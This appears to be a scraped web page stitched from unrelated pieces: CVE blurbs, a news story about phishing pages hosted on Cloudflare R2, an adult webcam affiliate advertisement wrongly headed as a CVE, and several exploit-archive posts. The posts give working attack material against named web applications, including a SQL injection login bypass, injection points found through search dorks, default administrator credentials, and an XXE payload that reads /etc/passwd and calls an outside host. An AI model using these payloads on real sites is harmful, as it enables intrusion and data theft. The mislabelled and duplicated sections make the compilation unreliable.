Insufficient data validation in Systems Extensions in Google Chrome on ChromeOS prior to 116.0.5845.120 allowed an attacker who convinced a user to install a malicious extension to bypass file restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-4369

Threat actors' use of Cloudflare R2 to host phishing pages has witnessed a 61-fold increase over the past six months.
"The majority of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps," Netskope security researcher Jan Michael said.
Cloudflare R2, analogous to Amazon Web Service S3, Google Cloud Storage, and

Threat actors' use of Cloudflare R2 to host phishing pages has witnessed a 61-fold increase over the past six months.

"The majority of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps," Netskope security researcher Jan Michael said.

Cloudflare R2, analogous to Amazon Web Service S3, Google Cloud Storage, and Azure Blob Storage, is a data storage service for the cloud.

The development comes as the total number of cloud apps from which malware downloads originate has increased to 167, with Microsoft OneDrive, Squarespace, GitHub, SharePoint, and Weebly taking the top five spots.

The phishing campaigns identified by Netskope not only abuse Cloudflare R2 to distribute static phishing pages, but also leverage the company's Turnstile offering, a CAPTCHA replacement, to place such pages behind anti-bot barriers to evade detection.

In doing so, it prevents online scanners like urlscan.io from reaching the actual phishing site, as the CAPTCHA test results in a failure.

As an additional layer of detection evasion, the malicious sites are designed to load the content only when certain conditions are met.

"The malicious website requires a referring site to include a timestamp after a hash symbol in the URL to display the actual phishing page," Michael said. "On the other hand, the referring site requires a phishing site passed on to it as a parameter."

In the event no URL parameter is passed to the referring site, visitors are redirected to www.google\[.\]com.

The development comes a month after the cybersecurity company disclosed details of a phishing campaign that was found hosting its bogus login pages in AWS Amplify to steal users' banking and Microsoft 365 credentials, along with card payment details via Telegram's Bot API.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Abusing Cloudflare R2 for Hosting Phishing Pages, Experts Warn

An issue in Python cpython v.3.7 allows an attacker to obtain sensitive information via the _asyncio._swap_current_task component.

**Easy, efficient and fully customizable white label cam sites****MAKE MONEY BY PROMOTING CAMS**

Get your own fully featured white label cam site powered by thousands of CAM4 performers giving the hottest live webcam shows and start to monetize your valuable (mobile/desktop) traffic into a source of real money. You will have access to all the tools and a huge global community of performers who are daily online.

You can create as many white label cam sites as you want and track your results in your Pink Label Dashboard.

**More then 10 years online!****All niches Covered**

Access and monetize this huge base of live performer content across countless niches with Pink Label.

CAM4 is one of the world’s top webcam platforms, on the market for over 10 years with a built up global community of 100s of thousands of performers and over 7 billion visits a month.

Create your own cam site, get your traffic thinking pink while you start making green.

**Your own cam site in just a few clicks****Fully customizable**

You can customize your own cam site however you want. Select the type of live content niches, ethnicity, orientation, performer attributes and languages.

Style your own cam site by selecting from available themes, layouts, upload your logos and tracking codes and start generating instant revenue.

Pink Label has created a platform that provides all the features combined with niche based live content that fits to your digital assets and/or marketing strategy.

You can run your own cam site on your own domain or subdomain by following the instructions in your Pink Label dashboard.

**Fully responsive templates****Multiple Layouts**

Select a theme and site layout that fits you the most. Each theme and layout is responsive and works perfectly on a desktop or mobile device.

You can choose from a thumbnail layout or activate a sidebar (left/right).

If you want to write custom CSS for a different template always make sure to update the white label first.

Add your social media accounts to cross promote your own white label cam site.

**Deep analytic overview****REALTIME statistics**

In your dashboard you will have an overview about your earnings, new generated leads, members and other site statistics.

Analyze and track your conversions and traffic campaigns to see what converts the best for your cam site.

**Making money with live cams made easy****What to Expect?**

Pink Label provides you all the features to be successful with promoting multi-niche live cam content.

**Dashboard overview**

Easy-to-use multi-featured dashboard which works smoothly from your desktop or mobile device.

**Desktop and Mobile**

Offer the best live user experience for your desktop and mobile traffic and start to earn instant money.

**Various live niches**

The biggest network of live performers and couples in every kind of niche or location you can think of.

**Multiple site themes**

Select your favorite site theme, layout and run your own cam site on you own Internet (sub)domains.

**Fully customizable**

Use custom CSS code to customize your own cam site in your own desired look/feel.

**Effective promo tools**

Generate XML/JSON feeds or dynamic banners to cross promote your own white label cam site.

**Real-time statistics**

Access detailed real-time statistics about your revenue share, PPL earnings and payouts.

**Customer Support**

Get the best support service from our team who are always ready to answer your questions.

**Top Earnings guaranteed**

You will get 20% Revenue Share from all the sales generated with your white label cam site or up-to $2.00 PPL (Pay-Per-Leads depends per GEO and device) for each new referred member.

Click here to register

**The latest technology mixed with the best live content****YOUR OWN CAM SITE IN JUST A FEW CLICKS**

White label cam platform created to serve different user groups and offer them unique cam sites to have extra revenue streams.

**Affiliates**

Create and configure your own white label cam site running on your own (sub)domain.

Monetize your traffic with the hottest performers giving live shows from all over the world.

Click here to register

**Your own white label cam site****Follow these steps**

**Create account**

**Create white label**

**Configure**

**Upload logos**

**Setup DNS**

**Make money**

**Choose what fits you the most****PAYOUT Structure**

**Revenue share**

20%/ rev share

*   Lifetime guaranteed

**PPL (Pay-Per-Lead)**

up-to $2/ PPL

*   GEO tier payouts for desktop and mobile

**Payout details**

$250/ minimum

1.  Payouts will be done on the 1st and 16th of the month
2.  There will be a 2 week holding period before payouts begin
3.  Your account must hit the $250 minimum payout
4.  You will be paid by wire or Paxum (ACH and Epay will be available shortly)

**GEO/DEVICE Tier program****PPL (pay-per-lead)**

Here you will have an overview how our PPL Tier program works.

**PPL (PAY-PER-LEAD) tiers**

Get paid for every new generated join.

Here you will find an overview from our PPL rates based on GEO tiers:

**Tier #1**  
desktop and mobile $2.00

**Tier #2**  
desktop and mobile $1.00

**Tier #3**  
desktop and mobile $0.02

**Tier #1**

Austria, Australia, Canada, United States, Germany, Netherlands, Italy, Switzerland, Belgium, France, United Kingdom, New Zealand, Spain, Denmark, Finland, Sweden, Norway

**Tier #2**

Portugal

**Tier #3**

Rest of the World

**Conditions**

Here you will find an overview how PPL joins are qualified.

*   PPL only applies for Pink Label white label sites
*   Each new join needs to be confirmed and activated (registration e-mail) by the new member
*   Each new join (member) needs to be logged in at least once into the joined product site

Note

:  
We use a strict anti-fraud policy. By monitoring and logging all activities on our platform we can easily detect possible cases of fraud and abuse.

In addition, we reserve the right to retroactively convert you to our Rev share Program if the quality of your traffic is extremely poor.

**Just try out the new Pink Label**

**Everything you'll need to monetize your traffic****Promo Tools**

Effective tools to increase your revenues

**Dynamic Banners**

Serie of converting dynamic banners in various dimensions to promote your white label cam site.

**XML/JSON feeds**

Generate your own customized XML or JSON feeds to integrate this within your online assets.

**More to come ...**

In the upcoming months we will add more promo tools which you can use to promote your own white label cam site.

**powered by cam4.com, the biggest amateur cam site in the world****Pink Label Features**

**FULLY CUSTOMIZABLE**

Make money with your own fully customized white label cam site in just a few clicks.

Select your desired site theme, layout and setup your your site through our user-friendly and advanced dashboard system.

Upload your logo, add your tracking codes, SEO meta data, social media accounts and switch your DNS to enable your own cam site.

We offer you the best white label cam site platform to get the most out of your valuable traffic!

**LIVE CONTENT IN EVERY NICHE**

You will have direct access to monetize the biggest pools of live webcam girls, guys and couples, all categories in various niches, GEO countries and languages.

Through the Pink Label dashboard you can easily select what kind of content will be published on your own niche based white label cam site.

You can create unlimited white label cam sites running on your own (sub)domain assets.

**CONVERTING MOBILE VERSION**

In 2018, 58% of site visits were from mobile devices.

All our templates are optimized to give your visitors and members the best user experience on their mobile device.

Targeted on optimal conversion and combined with niche based live content, you can easily monetize your traffic on your own customized white label cam site.

**REAL-TIME STATISTICS**

Within your Pink Label Dashboard you can track and analyze your traffic and conversion results for your white label cam sites.

Always monitor and optimize all your media campaigns to get the best conversions.

You will have instant access to generate reports and view your earnings and payout history.

**Everything you need to know about Pink Label****Frequently Asked Questions**

Can't find what you are looking for? Just use our **contact form** and will get back to you.

****What is Pink Label?****

Pink Label is a white label cam site generator for affiliating webmasters, webcam performers and studios from one of the biggest amateur adult webcam community sites, CAM4.

Pink Label uses the model base from CAM4 which is on the top of the market over the last 10 years and hosts more than 75,000 live webcam shows daily, offering more than 1 million hours of live streaming content each week.

Through Pink Label, you can easily create and style your own white label cam site and select which niches are published on your own internet domain or subdomain.

By promoting and driving traffic to your own white label cam site, you can easily create a solid revenue stream.

You will receive for each referred member, a one-time payout (PPL - pay-per-lead) OR you will receive a percentage (revenue share) from what your referred members eventually will spend on your white label cam site.

****What is a white label cam site?****

A white label cam site allows you to rebrand a cam community and promote it as your own site. The cam community takes care of the technical side of things and hiring the models.

All you have to focus on is promoting and driving traffic to your white label version of the cam site to start to make money.

You can give your white label cam site its own look/feel and run it like your own brand on your own Internet (sub)domain. With the right strategy and maintenance you can create a source of income by promoting your own white label cam site.

****How do I make money?****

Search Engine Optimalisation (SEO) is going to be your best friend. The first step is to submit your white label cam site to Google and other search engines, you'll gain a steady stream of organic traffic.

By building backlinks to your white label cam site, you'll get better rankings on the search engines.

Social media is another great avenue for promotion. Networks such as Twitter are adult friendly and will let you post nude or hardcore content. Other social networks only accept SFW content.

By frequently linking new content on social media networks to your white label cam site, you can drive traffic and get new customers.

If you are willing to spend a little bit of money on advertising, you can register as an advertiser for adult advertising networks and drive traffic that way.

By playing around with different display ad types, pop-unders, landings pages and other ads, you will find a converting combination that refers valuable customers for the best price possible.

You also might want to join adult forums, chatroom and other sites that can be a good way to drive quality traffic for free.

At Pink Label you can select between a revenue share or PPL pay-per-lead monetization payout model.

****How can I start and what do I need?****

The first step is to register on Pink Label.

Depending on the number of white label cam sites you want to start you would need one or more Internet domains, logos for your site, Google Analytic codes and you would need to submit your domain(s) for Google verification.

It's also recommended to create accounts on social media (for example Twitter) to promote your white label cam site with relevant posts.

****Can I upload my own banners and create text links?****

At the moment it isn't possible to upload your own banners or create custom text links on your own white label cam site.

These features will be available within a couple of months.

****Can I have my own cam site as a performer or webcam studio?****

We are working to offer performers and webcam studios their own white label cam site solution and expect this will be ready within a couple of months.

****When do I get paid?****

Payouts will be done on the 1st and 16th of the month. There will be a 2 week holding period before payouts begin. Your account must hit the $250 minimum payout.

****What pay out methods do you provide?****

Currently affiliates are paid by wire or paxum. ACH and epay will be available shortly.

**Wanna say hello?****Get In Touch**

**Company**

**Surecom Corporation NV**

CVE-2023-38898: Pink Label, create your own cam site

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

Elite CMS Pro version 2.01 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : Elite CMS Pro V2.01 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                              || # Vendor    : http://elitecms.net/                                                                                                 |  | # Dork      : Powered by Elite CMS Pro - Version 2.01                                                                              |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/index.php?mpage=3&subpage=1%27 <=====| iinject here[+] Panel :http://127.0.0.1/admin/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Elite CMS Pro 2.01 SQL Injection

Elevel CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Elevel CMS v1.0 authentication bypass vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.elevel.it/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] uSE pAYLOAD : user & pass : 1'or'1'='1[+] http://127.0.0.1/gruppimolleportoniit/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Elevel CMS 1.0 SQL Injection

Ekushey Project Manager CRM version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Ekushey Project Manager CRM V3.1 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://creativeitem.com/                                                                                           |  | # Dork      : "Login | Ekushey Project Manager CRM"                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] leave a default administrative account in place post installation.[+] User = admin@example.com & pass : 1234[+] http://127.0.0.1/Ekushey/index.php?admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ekushey Project Manager CRM 3.1 Insecure Settings

E-Journal Homoeo CMS version 2.0.3 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : E-Journal homoeo CMS v2.0.3 Sql inhection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://prosoftsolution.in//                                                                                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : job_detail.php?job_id=[+] https://127.0.0.1/homoeoaddain/job_detail.php?job_id=214%27 <====| inject here[+] Pan3l :  /adminsys/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

E-Journal Homoeo CMS 2.0.3 SQL Injection

EI Tube YouTube API version 3 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : EI Tube YouTube API V3 site builder Sql Injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://pomento.in/ei-tube-youtube-api-v3-site-builder/?v=fa3c7f2b5dae                                             |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /watch?page=%5c[+] https://127.0.0.1/ei-tubecom/watch?page=%5cGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

EI Tube YouTube API 3 SQL Injection

E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.

====================================================================================================================================  
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities",   
which instruct an XML processor to retrieve and perform   
an inline include of XML located at a particular URI.   
An external XML entity can be used to append or modify   
the document type declaration (DTD) associated with an   
XML document. An external XML entity can also be used   
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating   
from a source under attacker control. Most of the time   
the processor will not be validating, but it MAY include   
the replacement text thus initiating an unexpected file   
open operation, or HTTP transfer, or whatever system ids   
the XML processor knows how to access. 

below is a sample XML document that will use this functionality   
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE indoushka [  
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">  
]>  
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1  
Content-type: text/xml  
Host: landtop.com.tw  
Content-Length: 175  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE dt5fqyt [  
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">  
]>  
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>

[+] Affected items :

/webadmin/   
/webadmin/_chkpasswd.php   
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files,   
which may contain sensitive data such as passwords   
or private user data, using file: schemes or relative   
paths in the system identifier. Since the attack occurs   
relative to the application processing the XML document,   
an attacker may use this trusted application to pivot   
to other internal systems, possibly disclosing   
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Tag

#google